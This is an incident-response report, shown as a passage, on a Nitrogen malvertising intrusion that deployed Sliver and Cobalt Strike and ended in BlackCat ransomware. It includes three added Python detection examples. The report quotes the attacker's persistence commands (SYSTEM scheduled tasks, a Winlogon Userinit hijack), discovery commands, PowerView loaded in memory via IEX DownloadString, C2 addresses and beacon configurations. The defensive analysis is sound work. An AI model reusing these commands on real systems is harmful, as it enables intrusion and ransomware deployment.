URL: https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/

The DFIR Report

Real Intrusions by Real Attackers, The Truth Behind the Intrusion
blackcat cobaltstrike ransomware sliver


NITROGEN CAMPAIGN DROPS SLIVER AND ENDS WITH BLACKCAT RANSOMWARE

September 30, 2024


KEY TAKEAWAYS

 * In November 2023, we identified a BlackCat ransomware intrusion started by
   Nitrogen malware hosted on a website impersonating Advanced IP Scanner.
 * Nitrogen was leveraged to deploy Sliver and Cobalt Strike beacons on the
   beachhead host and perform further malicious actions. The two
   post-exploitation frameworks were loaded in memory through Python scripts.
 * After obtaining initial access and establishing further command and control
   connections, the threat actor enumerated the compromised network with the use
   of PowerSploit, SharpHound, and native Windows utilities. Impacket was
   employed to move laterally, after harvesting domain credentials.
 * The threat actor deployed an open-source backup tool called Restic on a file
   server to exfiltrate share data to a remote server.
 * Eight days after initial access, the threat actor modified a privileged user
   password and deployed BlackCat ransomware across the domain using PsExec to
   execute a batch script.
 * Six rules were added to our Private Ruleset related to this intrusion.

TABLE OF CONTENTS:

 * Case Summary
 * Services
 * Analysts
 * Initial Access
 * Execution
 * Persistence
 * Privilege Escalation
 * Defense Evasion
 * Credential Access
 * Discovery
 * Lateral Movement
 * Collection
 * Command and Control
 * Exfiltration
 * Impact
 * Timeline
 * Diamond Model
 * Indicators
 * Detections
 * MITRE ATT&CK


CASE SUMMARY

The incident began when a user unknowingly downloaded a malicious version of
Advanced IP Scanner from a fraudulent website that mimicked the legitimate one,
leveraging Google ads to rank higher in search results. Analysis of the attack
pattern and loader signature suggests this was part of a Nitrogen campaign,
consistent with previous public reports. The compromised installer came as a ZIP
file, which the victim extracted before launching the embedded executable,
triggering the infection.

The executable was a legitimate Python binary, which side-loaded a modified
Python DLL specifically designed to execute Nitrogen code. This process then
dropped a Sliver beacon in an AppData subfolder named “Notepad.” All malware
deployed during the intrusion was obfuscated using Py-Fuscate to conceal
malicious Python scripts. About eight minutes after the Nitrogen execution, the
attacker initiated hands-on keyboard discovery, utilizing Windows utilities such
as net, ipconfig, and nltest. Two minutes later, additional Sliver beacons were
deployed on the compromised host, with persistence established through scheduled
tasks and registry key modifications.

A little over an hour after the initial execution, the threat actor deployed
additional malware, this time Cobalt Strike beacons, again wrapped in the
Py-Fuscate obfuscation technique. The discovery phase continued with detailed
enumeration of the Active Directory domain, including local and domain
administrators, domain controllers, and computers. To deepen their understanding
of the environment, the attacker utilized tools such as SharpHound and
PowerSploit. The Cobalt Strike beacon was then used to dump domain credentials
from LSASS, granting the attacker local admin credentials with broad access
across the network.

Using the stolen credentials, the threat actor leveraged Impacket’s wmiexec to
move laterally to a server, where they used curl to download a ZIP file
containing their tools. After extracting the archive, they repeated the same
persistence techniques observed on the beachhead, creating scheduled tasks and
modifying registry keys. The attacker then targeted a second server, replicating
the same steps to deploy their tools and maintain persistence. Shortly after, a
second credential dump was performed, again targeting LSASS memory. Following
this, the threat actor began using a domain administrator account, indicating
they likely obtained those credentials during this phase.

The threat actor continued their lateral movement, replicating the same actions
on both a file server and a backup server. Approximately six hours after gaining
initial access, they deployed the open-source backup tool Restic on the file
server. Using Restic, the attacker exfiltrated data from the file shares to a
remote server located in Bulgaria. After this, the hands-on activity
significantly decreased and remained largely silent until the seventh day.

On the seventh day, the threat actor logged into the backup server and accessed
the backup console. No further actions were observed, leading us to assess that
this was likely a discovery effort aimed at understanding the backup
configurations.

On the eighth day, the threat actor shifted to their final objectives. They
identified the domain controllers and used xcopy from their initial lateral
movement server to transfer tools to one of the domain controllers, executing
them remotely via WMIC. Next, they ran a batch script on the domain controller
using PSEXEC, targeting a privileged backup service account, which changed that
account’s credentials. From the staging server, the attacker began distributing
the BlackCat ransomware binary across the network using SMB and the Windows copy
utility. This was followed by executing another batch script via PSEXEC on
multiple remote hosts, initiating the ransomware deployment.

The final script executed a series of actions on remote hosts, including
configuring them to start in Safe Mode with Networking and setting a registry
run key to launch the ransomware binary upon reboot. It also set the compromised
backup service account to auto login using Winlogon, and then forced a system
reboot. As a result, the hosts rebooted into Safe Mode, where the ransomware was
automatically executed. This led to file encryption across the affected systems,
with the ransomware leaving a note on each host. The Time to Ransomware (TTR)
was approximately 156 hours, spanning over eight calendar days.



THE DFIR REPORT SERVICES



 * Private Threat Briefs: Over 20 private DFIR reports annually.
 * Threat Feed: Focuses on tracking Command and Control frameworks like Cobalt
   Strike, Metasploit, Sliver, etc.
 * All Intel: Includes everything from Private Threat Briefs and Threat Feed,
   plus private events, opendir reports, long-term tracking, data clustering,
   and other curated intel.
 * Private Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases,
   mapped to ATT&CK with test examples.
 * DFIR Labs: Offers cloud-based, hands-on learning experiences, using real
   data, from real intrusions. Interactive labs are available with different
   difficulty levels and can be accessed on-demand, accommodating various
   learning speeds.



Contact us today for pricing or a demo!


ANALYSTS

Analysis and reporting completed by Angelo Violetti, @0xtornado (LinkedIn) and
@v3t0_.


INITIAL ACCESS

DRIVE-BY COMPROMISE

Based on threat intelligence sources and the file name, we are highly confident
that the threat actors accessed the victim’s infrastructure through a Nitrogen
campaign, which delivered a ZIP file via malicious Google ads (i.e.,
malvertising).

Nitrogen is known for leveraging legitimate utilities like Advanced IP Scanner,
Putty, etc. to conceal malware. The following graph shows the Nitrogen infection
chain and how it executed Sliver.



The ZIP file named Version.zip contained mainly:

 * a legitimate Python executable named setup.exe which was run by the victim.
 * two hidden Python DLLs.



Upon execution of Setup.exe, the following actions were performed:

 * The hidden python311.dll was loaded (DLL sideloading) and the Nitrogen code
   was launched.
 * A legitimate copy of Advanced IP Scanner was copied into the
   %Public%\Downloads folder.
 * python.exe, pycryptodome, and a Sliver beacon were placed into a folder named
   %AppData%\Notepad.
 * The Sliver beacon was executed through a Python script named slv.py which
   decrypts an AES-encrypted DLL (data.aes) and loads it into memory.
 * Advanced IP Scanner was installed in the compromised system.

A very similar campaign was reported by @dipotwb on Twitter. We also observed
overlap with campaigns reported by Esentire.




EXECUTION

A few minutes later, the threat actor deployed Python scripts on the beachhead,
serving as loaders for both Sliver and Cobalt Strike.



The following image shows the sequence of beacons executed on the beachhead
host.



SLIVER

The Python script, slv.py, used to load Sliver into memory, was heavily
obfuscated. However, buried within thousands of lines of code was the critical
section responsible for executing the Sliver beacon.



Based on the analysis of these artifacts, it appears the Sliver payload was
likely obfuscated using Py-Fuscate, as the tool’s encode function mirrored the
same imports and procedures found in the obfuscated script, effectively
concealing the malicious code.



The Sliver execution revealed multiple interesting debugging strings. In the
first instance, Windows API functions’ addresses are resolved.



Subsequently, the Sliver DLL is injected in memory and the DLL entrypoint is
called.



Those debugging strings are the same ones used by Pyramid in the
pythonmemorymodule which is a module used to inject and execute DLLs in memory.



By analyzing the Python.exe process memory, it was possible to observe the DLL
injected into the memory sections previously described in the debugging strings.





The Sliver DLL exports multiple functions, however, StartW is the one to run the
beacon.



Multiple strings related to Sliver were found in the process memory.



COBALT STRIKE

wo14.py is another highly obfuscated Python script that acts as a loader for
custom shellcode. In this specific case, the threat actor specified an
AES-encrypted Cobalt Strike shellcode which is:

 * Decrypted through the key “we3p2v5t85”.
 * Copied into a newly allocated memory region in the Heap.
 * Executed by invoking the function CreateThread.



wo12.py has the same behavior.



The Sysmon Event ID 10 shows the self-injection technique performed by the
Python Cobalt Strike loader.




PERSISTENCE

SCHEDULED TASK

During the intrusion, the threat actor created multiple scheduled tasks to
achieve persistence. This technique was used on the beachhead host and on each
host they moved to laterally during the first day.

schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /SC ONSTART /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr C:\Users\REDACTED\AppData\Local\Notepad\upedge.bat /SC ONSTART /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /SC ONSTART /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /SC ONSTART /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\users\REDACTED\appdata\local\notepad\UpdateEdge.bat /SC ONSTART /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /sc MINUTE /mo 720 /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr C:\Users\REDACTED\AppData\Local\Notepad\upedge.bat /sc MINUTE /mo 720 /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /sc MINUTE /mo 720 /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\users\REDACTED\appdata\local\notepad\UpdateEdge.bat /sc MINUTE /mo 720 /F
schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /sc MINUTE /mo 720 /F
schtasks /create /I 1 /TR C:\Users\REDACTED\AppData\Local\Notepad\UpdateEG.bat /TN UpdateEdge /SC ONIDLE


However, some of them contained mistakes and therefore did not work correctly.

For example, in the following task, the threat actor didn’t specify the “\”
between “C:” and the executable name.

schtasks /create /I 1 /TR C:WindowsTempUpdate.exe /TN UpdateEdge /SC ONIDLE




While some tasks used the ‘ONSTART’ option to enable persistence after reboot,
others used a time frame to execute every 720 minutes. For example, on a server
the threat actor dropped a BAT file named UpdateEdge.bat and subsequently created
two scheduled tasks using this option.
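The task command lines quoted above share a small set of traits a responder can check mechanically: a SYSTEM run-as, a .bat action in a user-writable folder, a task name borrowed from a Microsoft product, and in one case a path whose separators were lost. The following Python is an added example (not code from The DFIR Report); it parses schtasks /create command lines from process-creation telemetry and returns the reasons each one looks like persistence. The sample command lines are constructed to mirror the ones in the report, with REDACTED kept as a placeholder, and the last entry is a benign task for contrast.

```python
import re

# Constructed samples modelled on the report's command lines (REDACTED is kept as a
# placeholder). The last entry is a benign backup task for contrast.
SAMPLE_CMDLINES = [
    r'schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /SC ONSTART /F',
    r'schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr C:\Users\REDACTED\AppData\Local\Notepad\upedge.bat /sc MINUTE /mo 720 /F',
    r'schtasks /create /I 1 /TR C:\Users\REDACTED\AppData\Local\Notepad\UpdateEG.bat /TN UpdateEdge /SC ONIDLE',
    r'schtasks /create /I 1 /TR C:WindowsTempUpdate.exe /TN UpdateEdge /SC ONIDLE',
    r'schtasks /create /tn "Backup Nightly" /tr "C:\Program Files\Backup\agent.exe" /sc DAILY /st 02:00',
]

# /name followed by an optional value; a value never starts with another switch.
OPT_RE = re.compile(r'/(\w+)(?:\s+(?!/)("[^"]*"|\S+))?')
USER_WRITABLE = re.compile(r'\\(appdata|users\\public|windows\\temp|temp|programdata)\\', re.I)
SCRIPT_EXT = re.compile(r'\.(bat|cmd|vbs|js|ps1|hta)$', re.I)
VENDOR_WORDS = re.compile(r'onedrive|edge|office|windows|defender|update', re.I)
BROKEN_DRIVE = re.compile(r'^[a-z]:(?![\\/])', re.I)   # "C:WindowsTemp..." with no separators


def parse_schtasks(cmdline):
    """Return {switch_name_lower: value_or_None} for a schtasks command line."""
    opts = {}
    for name, value in OPT_RE.findall(cmdline):
        opts[name.lower()] = value.strip('"') if value else None
    return opts


def triage_task(cmdline):
    """Return the list of reasons a schtasks /create command line looks like persistence."""
    opts = parse_schtasks(cmdline)
    if 'create' not in opts:
        return []
    reasons = []
    run_as = (opts.get('ru') or '').upper()
    if run_as in ('SYSTEM', 'NT AUTHORITY\\SYSTEM'):
        reasons.append('runs_as_system')
    action = opts.get('tr') or ''
    if SCRIPT_EXT.search(action):
        reasons.append('script_action')
    if USER_WRITABLE.search(action):
        reasons.append('user_writable_path')
    if BROKEN_DRIVE.match(action):
        reasons.append('path_missing_separators')   # the mistake shown in the report
    if VENDOR_WORDS.search(opts.get('tn') or ''):
        reasons.append('name_mimics_vendor')
    return reasons


if __name__ == '__main__':
    for cmd in SAMPLE_CMDLINES:
        print(triage_task(cmd) or 'benign', '<-', cmd[:72])
```

Two or more reasons on one command line is a reasonable alerting threshold; a lone runs_as_system hit is common for legitimate software installers, while a script action in AppData combined with a vendor-sounding task name is rarely benign. The same parser also surfaces the broken task, which is worth keeping in a timeline even though it never ran.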





REGISTRY KEY

To ensure persistence on the beachhead host and three servers, the threat actor
added an entry in the Winlogon\Userinit registry key to ensure the execution of
UpdateEdge.bat whenever a user logs into the systems.

cmd.exe /C reg add "HKLM\software\microsoft\windows nt\currentversion\winlogon" /v UserInit /t reg_sz /d "c:\windows\system32\userinit.exe,c:\users\[REDACTED]\appdata\local\notepad\UpdateEdge.bat


 


PRIVILEGE ESCALATION

On the beachhead system, the initial payload setup.exe was executed with High
integrity level, which means that the binary was run with the access level
equivalent to Administrator access.



An injected cmd.exe process from the beachhead host opened winlogon.exe with an
access mask of 0x143A, which, when decoded, revealed the PROCESS_VM_WRITE
permission. The cmd.exe process then executed process injection into
winlogon.exe.
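An access mask such as 0x143A is just a sum of documented PROCESS_* bits, so decoding it is mechanical. The following Python is an added example (not code from The DFIR Report) that decodes a Sysmon Event ID 10 GrantedAccess mask against the winnt.h constants, reports whether the rights needed for code injection are all present, and applies that to a constructed event body shaped like the cmd.exe to winlogon.exe access described above. The CallTrace line in the sample is constructed too; Sysmon prints UNKNOWN for frames in unbacked memory.

```python
import re

# PROCESS_* access rights from winnt.h, plus the standard rights that also show up
# in Sysmon GrantedAccess masks.
PROCESS_ACCESS_RIGHTS = {
    0x0001: 'PROCESS_TERMINATE',
    0x0002: 'PROCESS_CREATE_THREAD',
    0x0004: 'PROCESS_SET_SESSIONID',
    0x0008: 'PROCESS_VM_OPERATION',
    0x0010: 'PROCESS_VM_READ',
    0x0020: 'PROCESS_VM_WRITE',
    0x0040: 'PROCESS_DUP_HANDLE',
    0x0080: 'PROCESS_CREATE_PROCESS',
    0x0100: 'PROCESS_SET_QUOTA',
    0x0200: 'PROCESS_SET_INFORMATION',
    0x0400: 'PROCESS_QUERY_INFORMATION',
    0x0800: 'PROCESS_SUSPEND_RESUME',
    0x1000: 'PROCESS_QUERY_LIMITED_INFORMATION',
    0x2000: 'PROCESS_SET_LIMITED_INFORMATION',
    0x00010000: 'DELETE',
    0x00020000: 'READ_CONTROL',
    0x00040000: 'WRITE_DAC',
    0x00080000: 'WRITE_OWNER',
    0x00100000: 'SYNCHRONIZE',
}
KNOWN_BITS = 0
for _bit in PROCESS_ACCESS_RIGHTS:
    KNOWN_BITS |= _bit

# Writing code into another process and starting it needs all three of these.
INJECTION_RIGHTS = {'PROCESS_VM_OPERATION', 'PROCESS_VM_WRITE', 'PROCESS_CREATE_THREAD'}


def decode_access_mask(mask):
    """Return (names of the rights set in mask, bits not covered by the table)."""
    names = [name for bit, name in sorted(PROCESS_ACCESS_RIGHTS.items()) if mask & bit]
    return names, mask & ~KNOWN_BITS


def injection_capable(mask):
    """True when the mask carries every right needed for classic code injection."""
    names, _ = decode_access_mask(mask)
    return INJECTION_RIGHTS.issubset(names)


# Constructed Sysmon Event ID 10 body in the shape the report describes.
SAMPLE_EVENT = (
    "Process accessed:\n"
    "SourceImage: C:\\Windows\\System32\\cmd.exe\n"
    "TargetImage: C:\\Windows\\System32\\winlogon.exe\n"
    "GrantedAccess: 0x143A\n"
    "CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d4b4|UNKNOWN(00000213AB3C0000)\n"
)


def triage_sysmon10(event_text):
    """Pull the fields a responder looks at first out of an Event ID 10 body."""
    fields = dict(re.findall(r'^(\w+):\s*(.*)$', event_text, re.M))
    mask = int(fields.get('GrantedAccess', '0'), 16)
    names, unmapped = decode_access_mask(mask)
    return {
        'source': fields.get('SourceImage', ''),
        'target': fields.get('TargetImage', ''),
        'rights': names,
        'unmapped_bits': unmapped,
        'injection_capable': injection_capable(mask),
        # UNKNOWN frames mean the caller ran from memory not backed by a file on disk
        'unbacked_call_trace': 'UNKNOWN(' in fields.get('CallTrace', ''),
    }


if __name__ == '__main__':
    for key, value in triage_sysmon10(SAMPLE_EVENT).items():
        print(f'{key:20} {value}')
```

0x143A decodes to CREATE_THREAD, VM_OPERATION, VM_READ, VM_WRITE, QUERY_INFORMATION and QUERY_LIMITED_INFORMATION; the combination of the first two with VM_WRITE is what makes a handle to winlogon.exe worth alerting on, and an UNKNOWN frame in the call trace from an already-suspicious source process strengthens the case.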





All scheduled tasks created by the threat actor were set up to run in the SYSTEM
context, ensuring that access would stay elevated on hosts.




DEFENSE EVASION

NITROGEN

By analyzing the modified Python DLL (python311.dll), we noticed multiple defense
evasion functionalities implemented, such as:

 * Removing hooks from Windows API functions.
 * Obfuscating the payload in memory (i.e., Sleep Obfuscation).
 * Bypassing AMSI, WLDP, and ETW.

Based on code overlaps, those techniques could have been copied from the
following GitHub repositories:

 * Antimalware-Research/Generic/Userland Hooking/AntiHook at master ·
   NtRaiseHardError/Antimalware-Research · GitHub
 * GitHub – RtlDallas/KrakenMask: Sleep obfuscation
 * donut/loader/bypass.c at master · TheWover/donut · GitHub
 * Patching WLDP · GitHub



An example of code overlap is shown in the following image, related to the
IsHooked() function.



MASQUERADING

With the aim of blending the malicious activities into normal system events, the
threat actor masqueraded both the initial payload and the persistence mechanisms
by:

 * Renaming python.exe to setup.exe.
 * Naming the scheduled tasks to mirror OneDrive and Microsoft Edge.
 * Renaming the Python executable used for executing their Python stagers for
   Sliver and Cobalt Strike.






PROCESS INJECTION

The threat actor was observed injecting into various processes during the
intrusion. One specific occasion was during the elevation to SYSTEM on the
beachhead host.




CLEARING LOGS

Execution of the ransomware payload included clearing of various event logs
while the hosts were in safe mode.




SAFEBOOT

Before executing the final ransomware, the threat actor set all hosts to restart
in safe mode with networking. This can be used to prevent antivirus or other
preventative tools from stopping the ransomware execution, as many won’t start
when a host is booted in safe mode. It has been used by several ransomware
families.




CREDENTIAL ACCESS

Two hours after initial access, the threat actor utilized Cobalt Strike’s
credential dumping functionality to access the LSASS process on the beachhead
host. This provided them access to a shared local administrator account. Around
two hours after that, having landed on a server during lateral movement
activity, the threat actor was seen accessing LSASS again. After this we observed
the use of a domain administrator account, indicating this second access likely
delivered those credentials.



 


DISCOVERY

SLIVER

A few minutes after its execution, Sliver launched the following commands to
enumerate:

 * Local and domain admins.
 * Domain computers.
 * Active Directory trusts.
 * Network adapters.

net group "domain admins" /domain
ipconfig /all
nltest /domain_trusts
net localgroup administrators
net group "Domain Computers" /domain


COBALT STRIKE

As with Sliver, Cobalt Strike was utilized to perform hands-on keyboard
discovery activities.

cmd.exe /C net group "Domain controllers" /DOMAIN
cmd.exe /C net group "domain admins" /DOMAIN
cmd.exe /C net localgroup Administrators
cmd.exe /C net group /Domain
cmd.exe /C net group "Domain Computers" /DOMAIN
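Both the Sliver and the Cobalt Strike command sets above are the same handful of native enumeration commands fired within seconds of each other, which is the signal to key on rather than any single command. The following Python is an added example (not code from The DFIR Report) that classifies process-creation command lines into discovery categories and raises one alert per host when a time-clustered run of commands covers several categories. The events are constructed for the example; the WS01 entries mirror the two command sets quoted above and WS02 is noise.

```python
import re
from datetime import datetime, timedelta

# Discovery command patterns, ordered so the more specific ones match first.
DISCOVERY_PATTERNS = [
    ('domain_admins',      re.compile(r'net\s+group\s+"?domain admins"?\s+/domain', re.I)),
    ('domain_controllers', re.compile(r'net\s+group\s+"?domain controllers"?\s+/domain', re.I)),
    ('domain_computers',   re.compile(r'net\s+group\s+"?domain computers"?\s+/domain', re.I)),
    ('domain_groups',      re.compile(r'net\s+group\s+/domain\s*$', re.I)),
    ('local_admins',       re.compile(r'net\s+localgroup\s+administrators', re.I)),
    ('domain_trusts',      re.compile(r'nltest\s+/domain_trusts', re.I)),
    ('network_config',     re.compile(r'ipconfig\s+/all', re.I)),
]


def classify(cmdline):
    """Return the discovery category of a command line, or None if it is not discovery."""
    for category, pattern in DISCOVERY_PATTERNS:
        if pattern.search(cmdline):
            return category
    return None


# Constructed process-creation events: (timestamp, host, command line).
SAMPLE_EVENTS = [
    ("2023-11-01 10:08:01", "WS01", 'net group "domain admins" /domain'),
    ("2023-11-01 10:08:05", "WS01", "ipconfig /all"),
    ("2023-11-01 10:08:09", "WS01", "nltest /domain_trusts"),
    ("2023-11-01 10:08:14", "WS01", "net localgroup administrators"),
    ("2023-11-01 10:08:20", "WS01", 'net group "Domain Computers" /domain'),
    ("2023-11-01 11:15:00", "WS01", 'cmd.exe /C net group "Domain controllers" /DOMAIN'),
    ("2023-11-01 11:15:03", "WS01", "cmd.exe /C net group /Domain"),
    ("2023-11-01 09:00:00", "WS02", "ipconfig /all"),          # an admin checking one thing
    ("2023-11-01 14:00:00", "WS02", "notepad.exe notes.txt"),  # not discovery at all
]


def find_discovery_bursts(events, gap=timedelta(minutes=5), threshold=3):
    """Cluster each host's discovery commands by time gap and return the clusters
    that cover at least `threshold` distinct categories, one alert per cluster."""
    by_host = {}
    for ts, host, cmd in events:
        category = classify(cmd)
        if category:
            stamp = datetime.strptime(ts, '%Y-%m-%d %H:%M:%S')
            by_host.setdefault(host, []).append((stamp, category))
    alerts = []
    for host, items in sorted(by_host.items()):
        items.sort()
        clusters, current = [], [items[0]]
        for prev, cur in zip(items, items[1:]):
            if cur[0] - prev[0] <= gap:
                current.append(cur)
            else:
                clusters.append(current)
                current = [cur]
        clusters.append(current)
        for cluster in clusters:
            categories = sorted({c for _, c in cluster})
            if len(categories) >= threshold:
                alerts.append({'host': host, 'start': cluster[0][0],
                               'end': cluster[-1][0], 'categories': categories})
    return alerts


if __name__ == '__main__':
    for alert in find_discovery_bursts(SAMPLE_EVENTS):
        print(alert['host'], alert['start'].time(), alert['end'].time(), alert['categories'])
```

With a five-minute gap and a three-category threshold the WS01 burst at 10:08 alerts, the two-command follow-up at 11:15 does not on its own, and WS02 stays quiet; tune the gap to the cadence of your own admin tooling, since a help-desk script that runs the same commands will cluster the same way and is best handled by excluding its parent process.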


POWERVIEW

On the beachhead host, the threat actor loaded PowerView in memory to perform
further discovery activities. This specific action was identified through
PowerShell Script Block Logging.



PowerView was used to:

 * Gather the local admins.

IEX (New-Object Net.Webclient).DownloadString('http://localhost:33121/'); Invoke-FindLocalAdminAccess -Thread 50


 * Extract the servers in the environment.

IEX (New-Object Net.Webclient).DownloadString('http://localhost:54350/'); Get-DomainComputer -OperatingSystem '*server*' -Properties 'name,operatingsystem,operatingsystemversion,lastlogontimestamp,dnshostname' -Ping >> srv.txt


BLOODHOUND

The $MFT also showed that in the first phases of the intrusion, the threat actor
performed a BloodHound collection, likely to identify paths to escalate
privileges to domain admin.




LATERAL MOVEMENT

REMOTE DESKTOP PROTOCOL

On the first day of the intrusion, four hours after the Nitrogen execution, the
threat actor started interacting with other systems such as a file server
through a Cobalt Strike beacon which was injected into winlogon.exe.



WINDOWS MANAGEMENT INSTRUMENTATION (WMI)

Four hours after initial access, the threat actor moved laterally to a server
using Impacket’s wmiexec and downloaded a ZIP file containing Python and a
Cobalt Strike beacon (wo12.py and wo14.py).






PASS THE HASH

During the intrusion we observed three instances of possible pass-the-hash
activity in the logs. These involved instances where the threat actor appeared
to be moving from the SYSTEM context to a domain administrator account.




SMB ADMIN SHARES

While some of the threat actor’s payloads were downloaded from a remote resource,
they also at times transferred their tooling laterally using SMB and then
executed it using WMIC or wmiexec.




COMMAND AND CONTROL

Over the course of the intrusion the threat actor relied on Sliver and Cobalt
Strike. Sliver was used most heavily during the first day of the intrusion with
Cobalt Strike then being used over the full length of the intrusion.





COBALT STRIKE

IP            Port  Ja3                               Ja3s                              ASN Org  ASN      Country
91.92.250.65  443   72a589da586844d7f0818ce684948eea  f176ba63b4d68e576b5ba345bec2c7b7  LIMENET  394,711  Bulgaria
91.92.250.60  443   72a589da586844d7f0818ce684948eea  f176ba63b4d68e576b5ba345bec2c7b7  LIMENET  394,711  Bulgaria

wo14.py Cobalt Strike configuration.

BeaconType                       - HTTPS
Port                             - 443
SleepTime                        - 38500
MaxGetSize                       - 13982519
Jitter                           - 27
MaxDNS                           - Not Found
PublicKey_MD5                    - 1329384dfdcfde2228da94e2a042f2b4
C2Server                         - 91.92.250.65,/broadcast
UserAgent                        - Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
HttpPostUri                      - /1/events/com.amazon.csm.csa.prod
Malleable_C2_Instructions        - Remove 1308 bytes from the end
                                   Remove 1 bytes from the end
                                   Remove 194 bytes from the beginning
                                   Base64 decode
HttpGet_Metadata                 - ConstHeaders
                                        Accept: application/json, text/plain, */*
                                        Accept-Language: en-US,en;q=0.5
                                        Origin: https://www.amazon.com
                                        Referer: https://www.amazon.com
                                        Sec-Fetch-Dest: empty
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Site: cross-site
                                        Te: trailers
                                   Metadata
                                        base64
                                        header "x-amzn-RequestId"
HttpPost_Metadata                - ConstHeaders
                                        Accept: */*
                                        Origin: https://www.amazon.com
                                   SessionId
                                        base64url
                                        header "x-amz-rid"
                                   Output
                                        base64url
                                        prepend "{"events":[{"data":{"schemaId":"csa.VideoInteractions.1","application":"Retail:Prod:,"requestId":"MBFV82TTQV2JNBKJJ50B","title":"Amazon.com. Spend less. Smile more.","subPageType":"desktop","session":{"id":"133-9905055-2677266"},"video":{"id":""
                                        append ""
"
                                        append ""playerMode":"INLINE","videoRequestId":"MBFV82TTQV2JNBKJJ50B","isAudioOn":"false","player":"IVS","event":"NONE"}}}}]}"
                                        print
PipeName                         - Not Found
DNS_Idle                         - Not Found
DNS_Sleep                        - Not Found
SSH_Host                         - Not Found
SSH_Port                         - Not Found
SSH_Username                     - Not Found
SSH_Password_Plaintext           - Not Found
SSH_Password_Pubkey              - Not Found
SSH_Banner                       -
HttpGet_Verb                     - GET
HttpPost_Verb                    - POST
HttpPostChunk                    - 0
Spawnto_x86                      - %windir%\syswow64\gpupdate.exe
Spawnto_x64                      - %windir%\sysnative\gpupdate.exe
CryptoScheme                     - 0
Proxy_Config                     - Not Found
Proxy_User                       - Not Found
Proxy_Password                   - Not Found
Proxy_Behavior                   - Use IE settings
Watermark_Hash                   - 3Hh1YX4vT3i5C7L2sn7K4Q==
Watermark                        - 587247372
bStageCleanup                    - True
bCFGCaution                      - True
KillDate                         - 0
bProcInject_StartRWX             - True
bProcInject_UseRWX               - False
bProcInject_MinAllocSize         - 16700
ProcInject_PrependAppend_x86     - b'\x90\x90\x90'
                                   Empty
ProcInject_PrependAppend_x64     - b'\x90\x90\x90\x90\x90\x90\x90\x90\x90'
                                   Empty
ProcInject_Execute               - ntdll.dll:RtlUserThreadStart
                                   SetThreadContext
                                   NtQueueApcThread-s
                                   kernel32.dll:LoadLibraryA
                                   CreateRemoteThread
                                   RtlCreateUserThread
ProcInject_AllocationMethod      - NtMapViewOfSection
bUsesCookies                     - False
HostHeader                       -
headersToRemove                  - Not Found
DNS_Beaconing                    - Not Found
DNS_get_TypeA                    - Not Found
DNS_get_TypeAAAA                 - Not Found
DNS_get_TypeTXT                  - Not Found
DNS_put_metadata                 - Not Found
DNS_put_output                   - Not Found
DNS_resolver                     - Not Found
DNS_strategy                     - round-robin
DNS_strategy_rotate_seconds      - -1
DNS_strategy_fail_x              - -1
DNS_strategy_fail_seconds        - -1
Retry_Max_Attempts               - 0
Retry_Increase_Attempts          - 0
Retry_Duration                   - 0


wo12.py Cobalt Strike configuration.

BeaconType                       - HTTPS
Port                             - 443
SleepTime                        - 38500
MaxGetSize                       - 13982519
Jitter                           - 27
MaxDNS                           - Not Found
PublicKey_MD5                    - f27a9b7c29960aaf911f2885b40536c2
C2Server                         - 91.92.250.60,/broadcast
UserAgent                        - Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
HttpPostUri                      - /1/events/com.amazon.csm.csa.prod
Malleable_C2_Instructions        - Remove 1308 bytes from the end
                                   Remove 1 bytes from the end
                                   Remove 194 bytes from the beginning
                                   Base64 decode
HttpGet_Metadata                 - ConstHeaders
                                        Accept: application/json, text/plain, */*
                                        Accept-Language: en-US,en;q=0.5
                                        Origin: https://www.amazon.com
                                        Referer: https://www.amazon.com
                                        Sec-Fetch-Dest: empty
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Site: cross-site
                                        Te: trailers
                                   Metadata
                                        base64
                                        header "x-amzn-RequestId"
HttpPost_Metadata                - ConstHeaders
                                        Accept: */*
                                        Origin: https://www.amazon.com
                                   SessionId
                                        base64url
                                        header "x-amz-rid"
                                   Output
                                        base64url
                                        prepend "{"events":[{"data":{"schemaId":"csa.VideoInteractions.1","application":"Retail:Prod:,"requestId":"MBFV82TTQV2JNBKJJ50B","title":"Amazon.com. Spend less. Smile more.","subPageType":"desktop","session":{"id":"133-9905055-2677266"},"video":{"id":""
                                        append ""
"
                                        append ""playerMode":"INLINE","videoRequestId":"MBFV82TTQV2JNBKJJ50B","isAudioOn":"false","player":"IVS","event":"NONE"}}}}]}"
                                        print
PipeName                         - Not Found
DNS_Idle                         - Not Found
DNS_Sleep                        - Not Found
SSH_Host                         - Not Found
SSH_Port                         - Not Found
SSH_Username                     - Not Found
SSH_Password_Plaintext           - Not Found
